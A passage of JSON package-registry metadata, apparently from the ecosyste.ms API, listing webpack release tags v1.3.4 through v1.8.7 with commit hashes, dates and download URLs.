:"tag","published_at":"2015-04-20T18:51:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.7/manifests"},{"name":"v1.8.6","sha":"a27641f8cc68ec557d9ca524afbbfb3b34ec2408","kind":"tag","published_at":"2015-04-20T17:46:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.6/manifests"},{"name":"v1.8.5","sha":"53a534663446bfaa8fc4b3c202542d6a8a2aaadc","kind":"tag","published_at":"2015-04-17T08:26:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.5/manifests"},{"name":"v1.8.4","sha":"bffe6037e99c7a741d64414368295b026d81c81a","kind":"tag","published_at":"2015-04-10T08:23:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.4/manifests"},{"name":"v1.8.3","sha":"13c3a3c3445ac9b76f3fe2602963e8748673b458","kind":"tag","published_at":"2015-04-09T22:19:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.3/manifests"},{"name":"v1.7.4","sha":"43a12294470d9e0337a325095e0fd4a3669ed6c6","kind":"tag","published_at":"2015-04-09T22:14:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.4/manifests"},{"name":"v1.8.2","sha":"4c2b7a9ea5b45481ad408c8275ef58e6140a038f","kind":"tag","published_at":"2015-04-08T13:12:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"af22dce84cb13facf372f179a6a174cafa0397dd","kind":"tag","published_at":"2015-04-08T06:11:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"1f74f58273ae008e315275c6caa31ae3fad42551","kind":"tag","published_at":"2015-04-07T12:34:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.0/manifests"},{"name":"v1.7.3","sha":"b1da5ed5c69f02cb9a4215a56157267b1de9a11b","kind":"commit","published_at":"2015-03-11T22:50:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"17d9dc161c7c8f969d83cb8503fead40db9798d9","kind":"commit","published_at":"2015-03-04T06:45:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"d09c8e713823c705cefea77bc34db6ab0e1cc0c3","kind":"commit","published_at":"2015-03-03T22:41:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.1/manifests"},{"name":"v1.7.0","sha":"e5b5fa6da79def97ac6c1017f3595fcefd5a74dd","kind":"commit","published_at":"2015-03-03T19:43:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.0/manifests"},{"name":"v1.6.0","sha":"ad81998305456c8447ce09d5ef2d4c950f7a4184","kind":"commit","published_at":"2015-02-23T22:02:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.6.0/manifests"},{"name":"v1.5.3","sha":"e46e5cbc514b17cc893dde394edc9a8a25baa5eb","kind":"commit","published_at":"2015-01-21T19:27:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.3/manifests"},{"name":"v1.5.2","sha":"bdabadf34f871fd19b1f960df6b8ab15ea915154","kind":"commit","published_at":"2015-01-21T19:25:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.2/manifests"},{"name":"v1.5.1","sha":"558ee89277d41529ff143af8e050f4c2917ea4b6","kind":"commit","published_at":"2015-01-17T23:50:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.1/manifests"},{"name":"v1.5.0","sha":"0e36e7e936b126dba526bddac557566ee982c432","kind":"commit","published_at":"2015-01-17T22:43:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.0/manifests"},{"name":"v1.4.15","sha":"431bd659be6dcd35fbe993a3a528d5774e82f745","kind":"commit","published_at":"2014-12-28T00:26:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.15","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.15/manifests"},{"name":"v1.4.14","sha":"6c45e24e4039f7298bfa8ca08a9614abc7aeaf08","kind":"commit","published_at":"2014-12-22T14:29:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.14","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.14/manifests"},{"name":"v1.4.13","sha":"34c509740b722ac9898ed262f88a8bba9d3237b7","kind":"commit","published_at":"2014-11-05T23:28:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.13/manifests"},{"name":"v1.4.12","sha":"5edcaea76d900134a50e5a16a07ab5da75c80c6a","kind":"commit","published_at":"2014-11-03T07:10:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.12/manifests"},{"name":"v1.4.11","sha":"8c606b490b248000466cc5be01019ce7d2eea407","kind":"commit","published_at":"2014-11-02T12:18:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.11/manifests"},{"name":"v1.4.10","sha":"9a375a770a9b1b235361dcda92844acad196dd47","kind":"commit","published_at":"2014-10-31T11:46:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.10/manifests"},{"name":"v1.4.9","sha":"b02ef8b2c386d34441af4b42aab248aeed014214","kind":"commit","published_at":"2014-10-26T10:19:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.9/manifests"},{"name":"v1.4.8","sha":"c6e1a8fb6d8714dec5bd05b7a6ae80b71b6e0262","kind":"commit","published_at":"2014-10-16T20:31:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.8/manifests"},{"name":"v1.4.7","sha":"4c0e1974e5c49ee4063cf301d49dc977f77a85b6","kind":"commit","published_at":"2014-10-13T14:10:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.7/manifests"},{"name":"v1.4.6","sha":"f0997230f35361ab62c2300133aece93f3ca1cc3","kind":"commit","published_at":"2014-10-12T10:30:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"272d7219cdec5f041e98e2163078c6d2ea772bdf","kind":"commit","published_at":"2014-10-07T13:56:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.5/manifests"},{"name":"v1.4.4","sha":"2bcb6f9bca77d5d4a42efface7c1e274412b5b64","kind":"commit","published_at":"2014-09-26T06:54:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.4/manifests"},{"name":"v1.4.3","sha":"91c7426e4595f0d3c45efc9c1e17b40d875e6de2","kind":"commit","published_at":"2014-09-23T06:43:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.3/manifests"},{"name":"v1.4.2","sha":"c117ec46eaa149d3732157744467e58b2baf4517","kind":"commit","published_at":"2014-09-22T21:51:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.2/manifests"},{"name":"v1.4.1-beta1","sha":"c59727720e4bf1feb5a1939b69154ceec0111ed0","kind":"commit","published_at":"2014-09-19T06:13:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.1-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.1-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.1-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.1-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.1-beta1/manifests"},{"name":"v1.4.0-beta10","sha":"4afdc81bc4fa95fad705957f335ab48c6f7feb9a","kind":"commit","published_at":"2014-09-17T21:25:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta10/manifests"},{"name":"v1.4.0-beta9","sha":"4e79c9f245c3df0173cb75312cde5f1c51c902f6","kind":"commit","published_at":"2014-09-16T17:36:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta9/manifests"},{"name":"v1.4.0-beta8","sha":"bd02534a588b4ddc2893b5d222836f7c8df8447e","kind":"commit","published_at":"2014-09-15T11:33:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta8/manifests"},{"name":"v1.4.0-beta7","sha":"81748e167a80d79454f44564ca146179b9692e6d","kind":"commit","published_at":"2014-09-15T11:27:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta7/manifests"},{"name":"v1.4.0-beta6","sha":"2eed5961b0433ed22fd0a8d825f7ff15fd0dbeb1","kind":"commit","published_at":"2014-09-11T18:22:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta6/manifests"},{"name":"v1.4.0-beta5","sha":"911b62cfcb702a5971c67a6e2b4f100118bd26e2","kind":"commit","published_at":"2014-09-10T12:10:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta5/manifests"},{"name":"v1.4.0-beta4","sha":"89db931fb0ab82a6a46bb7afa4ae57126d555090","kind":"commit","published_at":"2014-09-07T20:55:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta4/manifests"},{"name":"v1.4.0-beta3","sha":"970e16d69b64df94b1d7f5dcf8e0f6c25cc2ff61","kind":"commit","published_at":"2014-09-03T12:16:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta3/manifests"},{"name":"v1.4.0-beta2","sha":"a912045bd428f3970762a49457e1d5d95316f3c5","kind":"commit","published_at":"2014-08-29T14:08:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta2/manifests"},{"name":"v1.4.0-beta1","sha":"b014b77d7f7de8d5b2f3d8aa0ca2bda1e948fc1d","kind":"commit","published_at":"2014-08-27T15:18:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta1/manifests"},{"name":"v1.3.7","sha":"b9a84f89d40e618357c17430eb61f76ccf48bef2","kind":"commit","published_at":"2014-08-25T14:34:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.7/manifests"},{"name":"v1.3.6","sha":"19b618133a121d2fad838e74b0879fa94dfeef3d","kind":"commit","published_at":"2014-08-25T11:38:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.6/manifests"},{"name":"v1.3.5","sha":"382635d711081fb6fedb75719e4c7f0e1e40f766","kind":"commit","published_at":"2014-08-25T08:45:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.5/manifests"},{"name":"v1.3.4","sha":"b9ac3fa3c77d64856503013a7262efd5b368a199","kind":"commit","published_at":"2014-08-25T08:20:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/